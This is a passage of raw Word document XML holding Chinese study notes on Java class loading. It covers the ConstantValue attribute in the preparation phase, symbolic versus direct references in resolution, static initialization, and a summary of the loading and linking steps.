          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="009F4780">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就会初始化为</w:t>
      </w:r>
      <w:r w:rsidR="009F4780">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ConstantValue</w:t>
      </w:r>
      <w:r w:rsidR="009F4780">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>属性所指定的值。</w:t>
      </w:r>
      <w:r w:rsidR="000B2C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编译时</w:t>
      </w:r>
      <w:r w:rsidR="000B2C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Javac</w:t>
      </w:r>
      <w:r w:rsidR="000B2C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将会为</w:t>
      </w:r>
      <w:r w:rsidR="000B2C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="000B2C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r w:rsidR="000B2C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ConstantValue</w:t>
      </w:r>
      <w:r w:rsidR="000B2C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>属性，在准备阶段虚拟机就会根据</w:t>
      </w:r>
      <w:r w:rsidR="000B2C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ConstantValue</w:t>
      </w:r>
      <w:r w:rsidR="000B2C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的设置将</w:t>
      </w:r>
      <w:r w:rsidR="000B2C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="000B2C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>赋值为</w:t>
      </w:r>
      <w:r w:rsidR="007258ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
      <w:r w:rsidR="007258ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F4780" w:rsidRPr="009F4780" w:rsidRDefault="009F4780" w:rsidP="009F4780">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="105"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00680ABC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidR="00680ABC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00680ABC" w:rsidRDefault="00680ABC" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FB6FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟机常量</w:t>
      </w:r>
      <w:r w:rsidR="00CE712B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>池内的符号引用替换为直接引用的过程，符号引用用一组符号来描述所引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用的目标，直接引用是直接指向目标的指针。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E1F82" w:rsidRDefault="000E1F82" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00276F80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00534A79" w:rsidRPr="00276F80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在编译时，</w:t>
      </w:r>
      <w:r w:rsidR="00534A79" w:rsidRPr="00B46532">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="00534A79" w:rsidRPr="00B46532">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类并不知道引用类的实际内存地址，因此只能使用符号引用来代替</w:t>
      </w:r>
      <w:r w:rsidR="00534A79" w:rsidRPr="00276F80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00276F80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>符号引用是一个字符串，它给出了被引用的内容的名字并且可能会包含一些其他关于这个被引用项的信息——这些信息必须足以唯一的识别一个类、字段、方法。这样，对于其他类的符号引用必须给出类的全名。对于其他类的字段，必须给出类名、字段名以及字段描述符。对于其他类的方法的引用必须给出类名、方法名以及方法的描述符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00680ABC" w:rsidRPr="00680ABC" w:rsidRDefault="008E510B" w:rsidP="00680ABC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="105" w:hangingChars="50" w:hanging="105"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00680ABC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、初始化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00680ABC" w:rsidRDefault="00680ABC" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>准备阶段，变量已经赋值过一次系统要求的初始默认值。初始化阶段，程序员通过程序制定的主观计划去初始化类变量和其他资源。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>初始化静态变量，静态代码块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00680ABC" w:rsidRDefault="00680ABC" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00276F80" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>装载</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查找和导入</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00276F80" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00276F80" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>检查载入的</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件数据的正确性</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00276F80" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>准备</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为类的静态变量分配存储空间</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00276F80" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解析</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将符号引用转换成直接引用</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
